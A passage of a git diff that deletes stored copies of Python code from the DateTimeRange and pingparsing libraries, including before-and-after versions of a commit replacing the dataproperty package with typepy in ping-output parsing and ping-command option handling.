"2015-03-22T10:10:00+0900") - print "2015-03-22T10:05:00+0900" in time_range - print "2015-03-22T10:15:00+0900" in time_range - time_range_smaller = DateTimeRange( - "2015-03-22T10:03:00+0900", "2015-03-22T10:07:00+0900") - print time_range_smaller in time_range - - .. parsed-literal:: - - True - False - - .. seealso:: - - :py:meth:`.validate_time_inversion` - """ - - self.validate_time_inversion() - - if isinstance(x, DateTimeRange): - return x.start_datetime >= self.start_datetime and x.end_datetime <= self.end_datetime - - try: - value = dateutil.parser.parse(x) - except (TypeError, AttributeError): - value = x - - return self.start_datetime <= value <= self.end_datetime - - @property - def start_datetime(self): - """ - :return: Start time of the time range. - :rtype: datetime.datetime - - :Examples: - - .. code:: python - - from datetimerange import DateTimeRange - time_range = DateTimeRange( - "2015-03-22T10:00:00+0900", "2015-03-22T10:10:00+0900") - time_range.start_datetime - - .. parsed-literal:: - - datetime.datetime(2015, 3, 22, 10, 0, tzinfo=tzoffset(None, 32400)) - """ - - return self.__start_datetime - - @property - def end_datetime(self): - """ - :return: End time of the time range. - :rtype: datetime.datetime - - :Examples: - - .. code:: python - - from datetimerange import DateTimeRange - time_range = DateTimeRange( - "2015-03-22T10:00:00+0900", "2015-03-22T10:10:00+0900") - time_range.end_datetime - - .. 
parsed-literal:: - - datetime.datetime(2015, 3, 22, 10, 10, tzinfo=tzoffset(None, 32400)) - """ - - return self.__end_datetime - - @property - def timedelta(self): - """ - :return: - (|attr_end_datetime| - |attr_start_datetime|) as |timedelta| - :rtype: datetime.timedelta - - :Examples: - - .. code:: python - - from datetimerange import DateTimeRange - time_range = DateTimeRange( - "2015-03-22T10:00:00+0900", "2015-03-22T10:10:00+0900") - time_range.timedelta - - .. parsed-literal:: - - datetime.timedelta(0, 600) - """ - - return self.end_datetime - self.start_datetime - - def is_set(self): - """ - :return: - |True| if both |attr_start_datetime| and - |attr_end_datetime| were not |None|. - :rtype: bool - - :Examples: - - .. code:: python - - from datetimerange import DateTimeRange - time_range = DateTimeRange() - print time_range.is_set() - time_range.set_time_range( - "2015-03-22T10:00:00+0900", "2015-03-22T10:10:00+0900") - print time_range.is_set() - - .. parsed-literal:: - - False - True - """ - - return all([ - self.start_datetime is not None, - self.end_datetime is not None, - ]) - - def validate_time_inversion(self): - """ - Check time inversion of the time range. - - :raises ValueError: - If |attr_start_datetime| is - bigger than |attr_end_datetime|. - :raises TypeError: - Any one of |attr_start_datetime| and |attr_end_datetime|, - or both is inappropriate datetime value. - - :Examples: - - .. code:: python - - from datetimerange import DateTimeRange - time_range = DateTimeRange( - "2015-03-22T10:10:00+0900", "2015-03-22T10:00:00+0900") - try: - time_range.validate_time_inversion() - except ValueError: - print "time inversion" - - .. parsed-literal:: - - time inversion - """ - - if not self.is_set(): - # for python2/3 compatibility - raise TypeError - - if self.start_datetime > self.end_datetime: - message = "time inversion found: {:s} > {:s}".format( - str(self.start_datetime), str(self.end_datetime)) - raise ValueError(message) - - def is_valid_timerange(self): - """ - :return: - |True| if the time range is - not null and not time inversion. - :rtype: bool - - :Examples: - - .. code:: python - - from datetimerange import DateTimeRange - time_range = DateTimeRange() - print time_range.is_valid_timerange() - time_range.set_time_range( - "2015-03-22T10:20:00+0900", "2015-03-22T10:10:00+0900") - print time_range.is_valid_timerange() - time_range.set_time_range( - "2015-03-22T10:00:00+0900", "2015-03-22T10:10:00+0900") - print time_range.is_valid_timerange() - - .. parsed-literal:: - - False - False - True - - .. seealso:: - - :py:meth:`.is_set` - :py:meth:`.validate_time_inversion` - """ - - try: - self.validate_time_inversion() - except (TypeError, ValueError): - return False - - return self.is_set() - - def is_intersection(self, x): - """ - :param DateTimeRange x: Value to compare - :return: |True| if intersect with ``x`` - :rtype: bool - - :Examples: - - .. code:: python - - from datetimerange import DateTimeRange - time_range = DateTimeRange( - "2015-03-22T10:00:00+0900", "2015-03-22T10:10:00+0900") - x = DateTimeRange( - "2015-03-22T10:05:00+0900", "2015-03-22T10:15:00+0900") - time_range.is_intersection(x) - - .. parsed-literal:: - - True - """ - - import copy - - dtr = copy.deepcopy(self) - dtr.intersection(x) - - return dtr.is_set() - - def get_start_time_str(self): - """ - :return: - |attr_start_datetime| as |str| formatted with - |attr_start_time_format|. - Return |NaT| if invalid datetime or format. - :rtype: str - - :Examples: - - .. 
code:: python - - from datetimerange import DateTimeRange - time_range = DateTimeRange( - "2015-03-22T10:00:00+0900", "2015-03-22T10:10:00+0900") - print time_range.get_start_time_str() - time_range.start_time_format = "%Y/%m/%d %H:%M:%S" - print time_range.get_start_time_str() - - .. parsed-literal:: - - 2015-03-22T10:00:00+0900 - 2015/03/22 10:00:00 - """ - - try: - return self.start_datetime.strftime(self.start_time_format) - except AttributeError: - return self.NOT_A_TIME_STR - - def get_end_time_str(self): - """ - :return: - |attr_end_datetime| as a |str| formatted with - |attr_end_time_format|. - Return |NaT| if invalid datetime or format. - :rtype: str - - :Examples: - - .. code:: python - - from datetimerange import DateTimeRange - time_range = DateTimeRange( - "2015-03-22T10:00:00+0900", "2015-03-22T10:10:00+0900") - print time_range.get_end_time_str() - time_range.end_time_format = "%Y/%m/%d %H:%M:%S" - print time_range.get_end_time_str() - - .. parsed-literal:: - - 2015-03-22T10:10:00+0900 - 2015/03/22 10:10:00 - """ - - try: - return self.end_datetime.strftime(self.end_time_format) - except AttributeError: - return self.NOT_A_TIME_STR - - def get_timedelta_second(self): - """ - :return: (|attr_end_datetime| - |attr_start_datetime|) as seconds - :rtype: float - - :Examples: - - .. code:: python - - from datetimerange import DateTimeRange - time_range = DateTimeRange( - "2015-03-22T10:00:00+0900", "2015-03-22T10:10:00+0900") - time_range.get_timedelta_second() - - .. parsed-literal:: - - 600.0 - """ - - return self.__get_timedelta_sec(self.timedelta) - - def set_start_datetime(self, value): - """ - Set the start time of the time range. - - :param datetime.datetime/str value: |param_start_datetime| - :raises ValueError: If the value is invalid as a datetime value. - - :Examples: - - .. code:: python - - from datetimerange import DateTimeRange - time_range = DateTimeRange() - print time_range - time_range.set_start_datetime("2015-03-22T10:00:00+0900") - print time_range - - .. parsed-literal:: - - NaT - NaT - 2015-03-22T10:00:00+0900 - NaT - """ - - if value is None: - self.__start_datetime = None - return - - try: - self.__start_datetime = typepy.type.DateTime( - value, strict_level=typepy.StrictLevel.MIN).convert() - except typepy.TypeConversionError as e: - raise ValueError(e) - - def set_end_datetime(self, value): - """ - Set the end time of the time range. - - :param datetime.datetime/str value: |param_end_datetime| - :raises ValueError: If the value is invalid as a datetime value. - - :Examples: - - .. code:: python - - from datetimerange import DateTimeRange - time_range = DateTimeRange() - print time_range - time_range.set_end_datetime("2015-03-22T10:10:00+0900") - print time_range - - .. parsed-literal:: - - NaT - NaT - NaT - 2015-03-22T10:10:00+0900 - """ - - if value is None: - self.__end_datetime = None - return - - try: - self.__end_datetime = typepy.type.DateTime( - value, strict_level=typepy.StrictLevel.MIN).convert() - except typepy.TypeConversionError as e: - raise ValueError(e) - - def set_time_range(self, start, end): - """ - :param datetime.datetime/str start: |param_start_datetime| - :param datetime.datetime/str end: |param_end_datetime| - - :Examples: - - .. code:: python - - from datetimerange import DateTimeRange - time_range = DateTimeRange() - print time_range - time_range.set_time_range( - "2015-03-22T10:00:00+0900", "2015-03-22T10:10:00+0900") - print time_range - - .. 
parsed-literal:: - - NaT - NaT - 2015-03-22T10:00:00+0900 - 2015-03-22T10:10:00+0900 - """ - - self.set_start_datetime(start) - self.set_end_datetime(end) - - @staticmethod - def __compare_relativedelta(lhs, rhs): - if lhs.years < rhs.years: - return -1 - if lhs.years > rhs.years: - return 1 - - if lhs.months < rhs.months: - return -1 - if lhs.months > rhs.months: - return 1 - - if lhs.days < rhs.days: - return -1 - if lhs.days > rhs.days: - return 1 - - if lhs.hours < rhs.hours: - return -1 - if lhs.hours > rhs.hours: - return 1 - - if lhs.minutes < rhs.minutes: - return -1 - if lhs.minutes > rhs.minutes: - return 1 - - if lhs.seconds < rhs.seconds: - return -1 - if lhs.seconds > rhs.seconds: - return 1 - - if lhs.microseconds < rhs.microseconds: - return -1 - if lhs.microseconds > rhs.microseconds: - return 1 - - return 0 - - def __compare_timedelta(self, lhs, seconds): - try: - rhs = datetime.timedelta(seconds=seconds) - - if lhs < rhs: - return -1 - if lhs > rhs: - return 1 - - return 0 - except TypeError: - return self.__compare_relativedelta( - lhs.normalized(), rdelta.relativedelta(seconds=seconds)) - - def range(self, step): - """ - Return an iterator object. - - :param datetime.timedelta/dateutil.relativedelta.relativedelta step: - Step of iteration. - :return: iterator - :rtype: iterator - - :Examples: - - .. code:: python - - import datetime - from datetimerange import DateTimeRange - - time_range = DateTimeRange( - "2015-01-01T00:00:00+0900", "2015-01-04T00:00:00+0900") - for value in time_range.range(datetime.timedelta(days=1)): - print value - - .. parsed-literal:: - - 2015-01-01 00:00:00+09:00 - 2015-01-02 00:00:00+09:00 - 2015-01-03 00:00:00+09:00 - 2015-01-04 00:00:00+09:00 - """ - - if self.__compare_timedelta(step, 0) == 0: - raise ValueError("step must be not zero") - - is_inversion = False - try: - self.validate_time_inversion() - except ValueError: - is_inversion = True - - if not is_inversion: - if self.__compare_timedelta(step, seconds=0) < 0: - raise ValueError( - "invalid step: expect greater than 0, actual={}".format( - step)) - else: - if self.__compare_timedelta(step, seconds=0) > 0: - raise ValueError( - "invalid step: expect less than 0, actual={}".format( - step)) - - current_datetime = self.start_datetime - while current_datetime <= self.end_datetime: - yield current_datetime - current_datetime = current_datetime + step - - def intersection(self, x): - """ - Newly set a time range that overlaps - the input and the current time range. - - :param DateTimeRange x: - Value to compute intersection with the current time range. - - :Examples: - - .. code:: python - - from datetimerange import DateTimeRange - time_range = DateTimeRange( - "2015-03-22T10:00:00+0900", "2015-03-22T10:10:00+0900") - x = DateTimeRange( - "2015-03-22T10:05:00+0900", "2015-03-22T10:15:00+0900") - time_range.intersection(x) - time_range - - .. parsed-literal:: - - 2015-03-22T10:05:00+0900 - 2015-03-22T10:10:00+0900 - """ - - self.validate_time_inversion() - x.validate_time_inversion() - - if any([ - x.start_datetime in self, - self.start_datetime in x, - ]): - self.set_start_datetime(max(self.start_datetime, x.start_datetime)) - self.set_end_datetime(min(self.end_datetime, x.end_datetime)) - else: - self.set_start_datetime(None) - self.set_end_datetime(None) - - def encompass(self, x): - """ - Newly set a time range that encompasses - the input and the current time range. - - :param DateTimeRange x: - Value to compute encompass with the current time range. - - :Examples: - - .. 
code:: python
-
-            from datetimerange import DateTimeRange
-            time_range = DateTimeRange(
-                "2015-03-22T10:00:00+0900", "2015-03-22T10:10:00+0900")
-            x = DateTimeRange(
-                "2015-03-22T10:05:00+0900", "2015-03-22T10:15:00+0900")
-            time_range.encompass(x)
-            time_range
-
-        .. parsed-literal::
-
-            2015-03-22T10:00:00+0900 - 2015-03-22T10:15:00+0900
-        """
-
-        self.validate_time_inversion()
-        x.validate_time_inversion()
-
-        self.set_start_datetime(min(self.start_datetime, x.start_datetime))
-        self.set_end_datetime(max(self.end_datetime, x.end_datetime))
-
-    def truncate(self, percentage):
-        """
-        Truncate ``percentage`` / 2 [%] of whole time from first and last time.
-
-        :param float percentage: Percentage of truncate.
-
-        :Examples:
-
-        .. code:: python
-
-            from datetimerange import DateTimeRange
-            time_range = DateTimeRange(
-                "2015-03-22T10:00:00+0900", "2015-03-22T10:10:00+0900")
-            time_range.is_output_elapse = True
-            print time_range
-            time_range.truncate(10)
-            print time_range
-
-        .. parsed-literal::
-
-            2015-03-22T10:00:00+0900 - 2015-03-22T10:10:00+0900 (0:10:00)
-            2015-03-22T10:00:30+0900 - 2015-03-22T10:09:30+0900 (0:09:00)
-        """
-
-        self.validate_time_inversion()
-
-        if percentage < 0:
-            raise ValueError(
-                "discard_percent must be greater or equal to zero: " +
-                str(percentage))
-
-        if percentage == 0:
-            return
-
-        discard_time = self.timedelta // int(100) * int(percentage / 2)
-
-        self.__start_datetime += discard_time
-        self.__end_datetime -= discard_time
-
-    def __validate_value(self, data_prop):
-        if data_prop.typecode not in [dp.Typecode.DATETIME, dp.Typecode.NONE]:
-            raise ValueError("invalid datetime value: {}".format(data_prop))
-
-    @staticmethod
-    def __get_timedelta_sec(dt):
-        return int(
-            dt.days * 60 ** 2 * 24 + float(dt.seconds) +
-            dt.microseconds / (1000.0 ** 2))
diff --git a/v1/data/codefile/thombashi@pingparsing__45fac3c__pingparsing$_pingparsing.py.diff b/v1/data/codefile/thombashi@pingparsing__45fac3c__pingparsing$_pingparsing.py.diff
deleted file mode 100644
index bd7adf1..0000000
--- a/v1/data/codefile/thombashi@pingparsing__45fac3c__pingparsing$_pingparsing.py.diff
+++ /dev/null
@@ -1,57 +0,0 @@
-diff --git a/pingparsing/_pingparsing.py b/pingparsing/_pingparsing.py
- index 0b98aff8724ef994311f48b983bd411344463e4c..45fac3cb38661f80fc8bd129ce633cfd15423835 100644
- --- a/pingparsing/_pingparsing.py
- +++ b/pingparsing/_pingparsing.py
-@@ -5,13 +5,14 @@
- """
- 
- from __future__ import absolute_import
-+
- import re
- 
--import dataproperty
-+import typepy
- import pyparsing as pp
- 
--from .error import PingStaticticsHeaderNotFoundError
- from .error import EmptyPingStaticticsError
-+from .error import PingStaticticsHeaderNotFoundError
- 
- 
- def _to_unicode(text):
-@@ -131,7 +132,7 @@
- 
-         self.__initialize_parse_result()
- 
--        if dataproperty.is_empty_string(ping_message):
-+        if typepy.is_null_string(ping_message):
-             return
- 
-         try:
-@@ -153,7 +154,7 @@
-         return i
- 
-     def __validate_stats_body(self, body_line_list):
--        if dataproperty.is_empty_sequence(body_line_list):
-+        if typepy.is_empty_sequence(body_line_list):
-             raise EmptyPingStaticticsError("ping statistics is empty")
- 
-     def __parse_windows_ping(self, ping_message):
-@@ -183,7 +184,7 @@
-             rtt_line = body_line_list[2].strip()
-         except IndexError:
-             return
--        if dataproperty.is_empty_string(rtt_line):
-+        if typepy.is_null_string(rtt_line):
-             return
-         rtt_pattern = (
-             pp.Literal("Minimum = ") +
-@@ -230,7 +231,7 @@ class PingParsing(object):
-             rtt_line = body_line_list[1]
-         except IndexError:
-             return
--        if dataproperty.is_empty_string(rtt_line):
-+        if typepy.is_null_string(rtt_line):
-             return
- 
-         rtt_pattern = (
diff --git a/v1/data/codefile/thombashi@pingparsing__45fac3c__pingparsing$_pingparsing.py.source.py b/v1/data/codefile/thombashi@pingparsing__45fac3c__pingparsing$_pingparsing.py.source.py
deleted file mode 100644
index 8154e1f..0000000
--- a/v1/data/codefile/thombashi@pingparsing__45fac3c__pingparsing$_pingparsing.py.source.py
+++ /dev/null
@@ -1,261 +0,0 @@
-# encoding: utf-8
-
-"""
-.. codeauthor:: Tsuyoshi Hombashi
-"""
-
-from __future__ import absolute_import
-import re
-
-import dataproperty
-import pyparsing as pp
-
-from .error import PingStaticticsHeaderNotFoundError
-from .error import EmptyPingStaticticsError
-
-
-def _to_unicode(text):
-    try:
-        return text.decode("ascii")
-    except AttributeError:
-        return text
-
-
-class PingParsing(object):
-    """
-    Parser class to parsing ping command output.
-    """
-
-    def __init__(self):
-        self.destination_host = ""
-        self.ping_option = ""
-
-        self.__initialize_parse_result()
-
-    @property
-    def packet_transmit(self):
-        """
-        :return: Number of packets transmitted.
-        :rtype: int
-        """
-
-        return self.__packet_transmit
-
-    @property
-    def packet_receive(self):
-        """
-        :return: Number of packets received.
-        :rtype: int
-        """
-
-        return self.__packet_receive
-
-    @property
-    def packet_loss(self):
-        """
-        :return: Percentage of packet loss [%].
-        :rtype: float
-        """
-
-        return self.__packet_loss
-
-    @property
-    def rtt_min(self):
-        """
-        :return: Minimum round trip time of transmitted ICMP packets [ms].
-        :rtype: float
-        """
-
-        return self.__rtt_min
-
-    @property
-    def rtt_avg(self):
-        """
-        :return: Average round trip time of transmitted ICMP packets [ms].
-        :rtype: float
-        """
-
-        return self.__rtt_avg
-
-    @property
-    def rtt_max(self):
-        """
-        :return: Maximum round trip time of transmitted ICMP packets [ms].
-        :rtype: float
-        """
-
-        return self.__rtt_max
-
-    @property
-    def rtt_mdev(self):
-        """
-        :return: Standard deviation of transmitted ICMP packets (Linux only).
-        :rtype: float
-        """
-
-        return self.__rtt_mdev
-
-    def as_dict(self):
-        """
-        :return: Parsed result as a dictionary.
-        :rtype: dict
-        """
-
-        return {
-            "packet_transmit": self.packet_transmit,
-            "packet_receive": self.packet_receive,
-            "packet_loss": self.packet_loss,
-            "rtt_min": self.rtt_min,
-            "rtt_avg": self.rtt_avg,
-            "rtt_max": self.rtt_max,
-            "rtt_mdev": self.rtt_mdev,
-        }
-
-    def parse(self, ping_message):
-        """
-        Parse ping command output.
-        You can get parsing results by attributes:
-
-        - :py:attr:`.packet_transmit`
-        - :py:attr:`.packet_receive`
-        - :py:attr:`.packet_loss`
-        - :py:attr:`.rtt_min`
-        - :py:attr:`.rtt_avg`
-        - :py:attr:`.rtt_max`
-        - :py:attr:`.rtt_mdev`
-
-        Or you can get as a dictionary by :py:meth:`.as_dict`
-
-        :param str ping_message: String of ping command output.
- """ - - self.__initialize_parse_result() - - if dataproperty.is_empty_string(ping_message): - return - - try: - self.__parse_linux_ping(ping_message) - return - except PingStaticticsHeaderNotFoundError: - pass - - self.__parse_windows_ping(ping_message) - - def __find_ststs_head_line_idx(self, line_list, re_stats_header): - for i, line in enumerate(line_list): - if re_stats_header.search(line): - break - else: - raise PingStaticticsHeaderNotFoundError( - "ping statistics not found") - - return i - - def __validate_stats_body(self, body_line_list): - if dataproperty.is_empty_sequence(body_line_list): - raise EmptyPingStaticticsError("ping statistics is empty") - - def __parse_windows_ping(self, ping_message): - line_list = _to_unicode(ping_message).splitlines() - - i = self.__find_ststs_head_line_idx( - line_list, re.compile("^Ping statistics for ")) - - body_line_list = line_list[i + 1:] - self.__validate_stats_body(body_line_list) - packet_line = body_line_list[0].strip() - packet_pattern = ( - pp.Literal("Packets: Sent = ") + - pp.Word(pp.nums) + - pp.Literal(", Received = ") + - pp.Word(pp.nums) + - pp.Literal(", Lost = ") + - pp.Word(pp.nums) + "(" + - pp.Word(pp.nums + ".") - ) - parse_list = packet_pattern.parseString(_to_unicode(packet_line)) - self.__packet_transmit = int(parse_list[1]) - self.__packet_receive = int(parse_list[3]) - self.__packet_loss = float(parse_list[7]) - - try: - rtt_line = body_line_list[2].strip() - except IndexError: - return - if dataproperty.is_empty_string(rtt_line): - return - rtt_pattern = ( - pp.Literal("Minimum = ") + - pp.Word(pp.nums) + - pp.Literal("ms, Maximum = ") + - pp.Word(pp.nums) + - pp.Literal("ms, Average = ") + - pp.Word(pp.nums) - ) - try: - parse_list = rtt_pattern.parseString(_to_unicode(rtt_line)) - except pp.ParseBaseException: - return - - self.__rtt_min = float(parse_list[1]) - self.__rtt_avg = float(parse_list[5]) - self.__rtt_max = float(parse_list[3]) - - def __parse_linux_ping(self, ping_message): - line_list = _to_unicode(ping_message).splitlines() - - i = self.__find_ststs_head_line_idx( - line_list, re.compile("--- .* ping statistics ---")) - - body_line_list = line_list[i + 1:] - self.__validate_stats_body(body_line_list) - - packet_line = body_line_list[0] - packet_pattern = ( - pp.Word(pp.nums) + - pp.Literal("packets transmitted,") + - pp.Word(pp.nums) + - pp.Literal("received,") + - pp.SkipTo(pp.Word(pp.nums + ".%") + pp.Literal("packet loss")) + - pp.Word(pp.nums + ".") + - pp.Literal("% packet loss") - ) - parse_list = packet_pattern.parseString(_to_unicode(packet_line)) - self.__packet_transmit = int(parse_list[0]) - self.__packet_receive = int(parse_list[2]) - self.__packet_loss = float(parse_list[-2]) - - try: - rtt_line = body_line_list[1] - except IndexError: - return - if dataproperty.is_empty_string(rtt_line): - return - - rtt_pattern = ( - pp.Literal("rtt min/avg/max/mdev =") + - pp.Word(pp.nums + ".") + "/" + - pp.Word(pp.nums + ".") + "/" + - pp.Word(pp.nums + ".") + "/" + - pp.Word(pp.nums + ".") + - pp.Word(pp.nums + "ms") - ) - try: - parse_list = rtt_pattern.parseString(_to_unicode(rtt_line)) - except pp.ParseBaseException: - return - - self.__rtt_min = float(parse_list[1]) - self.__rtt_avg = float(parse_list[3]) - self.__rtt_max = float(parse_list[5]) - self.__rtt_mdev = float(parse_list[7]) - - def __initialize_parse_result(self): - self.__packet_transmit = None - self.__packet_receive = None - self.__packet_loss = None - self.__rtt_min = None - self.__rtt_avg = None - self.__rtt_max = None - 
self.__rtt_mdev = None diff --git a/v1/data/codefile/thombashi@pingparsing__45fac3c__pingparsing$_pingparsing.py.target.py b/v1/data/codefile/thombashi@pingparsing__45fac3c__pingparsing$_pingparsing.py.target.py deleted file mode 100644 index af3d0c5..0000000 --- a/v1/data/codefile/thombashi@pingparsing__45fac3c__pingparsing$_pingparsing.py.target.py +++ /dev/null @@ -1,262 +0,0 @@ -# encoding: utf-8 - -""" -.. codeauthor:: Tsuyoshi Hombashi -""" - -from __future__ import absolute_import - -import re - -import typepy -import pyparsing as pp - -from .error import EmptyPingStaticticsError -from .error import PingStaticticsHeaderNotFoundError - - -def _to_unicode(text): - try: - return text.decode("ascii") - except AttributeError: - return text - - -class PingParsing(object): - """ - Parser class to parsing ping command output. - """ - - def __init__(self): - self.destination_host = "" - self.ping_option = "" - - self.__initialize_parse_result() - - @property - def packet_transmit(self): - """ - :return: Number of packets transmitted. - :rtype: int - """ - - return self.__packet_transmit - - @property - def packet_receive(self): - """ - :return: Number of packets received. - :rtype: int - """ - - return self.__packet_receive - - @property - def packet_loss(self): - """ - :return: Percentage of packet loss [%]. - :rtype: float - """ - - return self.__packet_loss - - @property - def rtt_min(self): - """ - :return: Minimum round trip time of transmitted ICMP packets [ms]. - :rtype: float - """ - - return self.__rtt_min - - @property - def rtt_avg(self): - """ - :return: Average round trip time of transmitted ICMP packets [ms]. - :rtype: float - """ - - return self.__rtt_avg - - @property - def rtt_max(self): - """ - :return: Maximum round trip time of transmitted ICMP packets [ms]. - :rtype: float - """ - - return self.__rtt_max - - @property - def rtt_mdev(self): - """ - :return: Standard deviation of transmitted ICMP packets (Linux only). - :rtype: float - """ - - return self.__rtt_mdev - - def as_dict(self): - """ - :return: Parsed result as a dictionary. - :rtype: dict - """ - - return { - "packet_transmit": self.packet_transmit, - "packet_receive": self.packet_receive, - "packet_loss": self.packet_loss, - "rtt_min": self.rtt_min, - "rtt_avg": self.rtt_avg, - "rtt_max": self.rtt_max, - "rtt_mdev": self.rtt_mdev, - } - - def parse(self, ping_message): - """ - Parse ping command output. - You can get parsing results by attributes: - - - :py:attr:`.packet_transmit` - - :py:attr:`.packet_receive` - - :py:attr:`.packet_loss` - - :py:attr:`.rtt_min` - - :py:attr:`.rtt_avg` - - :py:attr:`.rtt_max` - - :py:attr:`.rtt_mdev` - - Or you can get as a dictionary by :py:meth:`.as_dict` - - :param str ping_message: String of ping command output. 
- """ - - self.__initialize_parse_result() - - if typepy.is_null_string(ping_message): - return - - try: - self.__parse_linux_ping(ping_message) - return - except PingStaticticsHeaderNotFoundError: - pass - - self.__parse_windows_ping(ping_message) - - def __find_ststs_head_line_idx(self, line_list, re_stats_header): - for i, line in enumerate(line_list): - if re_stats_header.search(line): - break - else: - raise PingStaticticsHeaderNotFoundError( - "ping statistics not found") - - return i - - def __validate_stats_body(self, body_line_list): - if typepy.is_empty_sequence(body_line_list): - raise EmptyPingStaticticsError("ping statistics is empty") - - def __parse_windows_ping(self, ping_message): - line_list = _to_unicode(ping_message).splitlines() - - i = self.__find_ststs_head_line_idx( - line_list, re.compile("^Ping statistics for ")) - - body_line_list = line_list[i + 1:] - self.__validate_stats_body(body_line_list) - packet_line = body_line_list[0].strip() - packet_pattern = ( - pp.Literal("Packets: Sent = ") + - pp.Word(pp.nums) + - pp.Literal(", Received = ") + - pp.Word(pp.nums) + - pp.Literal(", Lost = ") + - pp.Word(pp.nums) + "(" + - pp.Word(pp.nums + ".") - ) - parse_list = packet_pattern.parseString(_to_unicode(packet_line)) - self.__packet_transmit = int(parse_list[1]) - self.__packet_receive = int(parse_list[3]) - self.__packet_loss = float(parse_list[7]) - - try: - rtt_line = body_line_list[2].strip() - except IndexError: - return - if typepy.is_null_string(rtt_line): - return - rtt_pattern = ( - pp.Literal("Minimum = ") + - pp.Word(pp.nums) + - pp.Literal("ms, Maximum = ") + - pp.Word(pp.nums) + - pp.Literal("ms, Average = ") + - pp.Word(pp.nums) - ) - try: - parse_list = rtt_pattern.parseString(_to_unicode(rtt_line)) - except pp.ParseBaseException: - return - - self.__rtt_min = float(parse_list[1]) - self.__rtt_avg = float(parse_list[5]) - self.__rtt_max = float(parse_list[3]) - - def __parse_linux_ping(self, ping_message): - line_list = _to_unicode(ping_message).splitlines() - - i = self.__find_ststs_head_line_idx( - line_list, re.compile("--- .* ping statistics ---")) - - body_line_list = line_list[i + 1:] - self.__validate_stats_body(body_line_list) - - packet_line = body_line_list[0] - packet_pattern = ( - pp.Word(pp.nums) + - pp.Literal("packets transmitted,") + - pp.Word(pp.nums) + - pp.Literal("received,") + - pp.SkipTo(pp.Word(pp.nums + ".%") + pp.Literal("packet loss")) + - pp.Word(pp.nums + ".") + - pp.Literal("% packet loss") - ) - parse_list = packet_pattern.parseString(_to_unicode(packet_line)) - self.__packet_transmit = int(parse_list[0]) - self.__packet_receive = int(parse_list[2]) - self.__packet_loss = float(parse_list[-2]) - - try: - rtt_line = body_line_list[1] - except IndexError: - return - if typepy.is_null_string(rtt_line): - return - - rtt_pattern = ( - pp.Literal("rtt min/avg/max/mdev =") + - pp.Word(pp.nums + ".") + "/" + - pp.Word(pp.nums + ".") + "/" + - pp.Word(pp.nums + ".") + "/" + - pp.Word(pp.nums + ".") + - pp.Word(pp.nums + "ms") - ) - try: - parse_list = rtt_pattern.parseString(_to_unicode(rtt_line)) - except pp.ParseBaseException: - return - - self.__rtt_min = float(parse_list[1]) - self.__rtt_avg = float(parse_list[3]) - self.__rtt_max = float(parse_list[5]) - self.__rtt_mdev = float(parse_list[7]) - - def __initialize_parse_result(self): - self.__packet_transmit = None - self.__packet_receive = None - self.__packet_loss = None - self.__rtt_min = None - self.__rtt_avg = None - self.__rtt_max = None - self.__rtt_mdev = None diff --git 
a/v1/data/codefile/thombashi@pingparsing__45fac3c__pingparsing$_pingtransmitter.py.diff b/v1/data/codefile/thombashi@pingparsing__45fac3c__pingparsing$_pingtransmitter.py.diff
deleted file mode 100644
index 4d81f8c..0000000
--- a/v1/data/codefile/thombashi@pingparsing__45fac3c__pingparsing$_pingtransmitter.py.diff
+++ /dev/null
@@ -1,80 +0,0 @@
-diff --git a/pingparsing/_pingtransmitter.py b/pingparsing/_pingtransmitter.py
- index 0b98aff8724ef994311f48b983bd411344463e4c..45fac3cb38661f80fc8bd129ce633cfd15423835 100644
- --- a/pingparsing/_pingtransmitter.py
- +++ b/pingparsing/_pingtransmitter.py
-@@ -8,7 +8,8 @@ from __future__ import absolute_import
- from collections import namedtuple
- import platform
- 
--import dataproperty as dp
-+import typepy
-+from typepy.type import Integer
- 
- 
- class PingResult(namedtuple("PingResult", "stdout stderr returncode")):
-@@ -83,7 +84,7 @@ class PingTransmitter(object):
- 
-         command_list = self.__get_base_ping_command()
- 
--        if dp.is_not_empty_string(self.ping_option):
-+        if typepy.is_not_null_string(self.ping_option):
-             command_list.append(self.ping_option)
- 
-         command_list.append(self.__get_waittime_option())
-@@ -97,7 +98,7 @@
-         return PingResult(stdout, stderr, ping_proc.returncode)
- 
-     def __validate_ping_param(self):
--        if dp.is_empty_string(self.destination_host):
-+        if typepy.is_null_string(self.destination_host):
-             raise ValueError("required destination_host")
- 
-         self.__validate_waittime()
-@@ -107,8 +108,9 @@
-         if self.waittime is None:
-             return
- 
--        waittime = dp.IntegerType(self.waittime).try_convert()
--        if waittime is None:
-+        try:
-+            waittime = Integer(self.waittime).convert()
-+        except typepy.TypeConversionError:
-             raise ValueError("wait time must be an integer: actual={}".format(
-                 self.waittime))
- 
-@@ -119,8 +121,9 @@
-         if self.count is None:
-             return
- 
--        count = dp.IntegerType(self.count).try_convert()
--        if count is None:
-+        try:
-+            count = Integer(self.count).convert()
-+        except typepy.TypeConversionError:
-             raise ValueError("count must be an integer: actual={}".format(
-                 self.count))
- 
-@@ -141,8 +144,9 @@
-         return command_list
- 
-     def __get_waittime_option(self):
--        waittime = dp.IntegerType(self.waittime).try_convert()
--        if waittime is None:
-+        try:
-+            waittime = Integer(self.waittime).convert()
-+        except typepy.TypeConversionError:
-             return ""
- 
-         if platform.system() == "Windows":
-@@ -151,8 +155,9 @@
-             return "-q -w {:d}".format(waittime)
- 
-     def __get_count_option(self):
--        count = dp.IntegerType(self.count).try_convert()
--        if count is None:
-+        try:
-+            count = Integer(self.count).convert()
-+        except typepy.TypeConversionError:
-             return ""
- 
-         if platform.system() == "Windows":
diff --git a/v1/data/codefile/thombashi@pingparsing__45fac3c__pingparsing$_pingtransmitter.py.source.py b/v1/data/codefile/thombashi@pingparsing__45fac3c__pingparsing$_pingtransmitter.py.source.py
deleted file mode 100644
index 112a80b..0000000
--- a/v1/data/codefile/thombashi@pingparsing__45fac3c__pingparsing$_pingtransmitter.py.source.py
+++ /dev/null
@@ -1,161 +0,0 @@
-# encoding: utf-8
-
-"""
-.. codeauthor:: Tsuyoshi Hombashi
-"""
-
-from __future__ import absolute_import
-from collections import namedtuple
-import platform
-
-import dataproperty as dp
-
-
-class PingResult(namedtuple("PingResult", "stdout stderr returncode")):
-    """
-    Data class to store ``ping`` command execution result.
-
-    .. py:attribute:: stdout
-
-        Standard output of ``ping`` command execution result.
-
-    .. py:attribute:: stderr
-
-        Standard error of ``ping`` command execution result.
-
-    .. py:attribute:: returncode
-
-        Return code of ``ping`` command execution result.
-    """
-
-
-class PingTransmitter(object):
-    """
-    Transmitter class to send ICMP packets by using the OS built-in ``ping``
-    command.
-
-    .. py:attribute:: destination_host
-
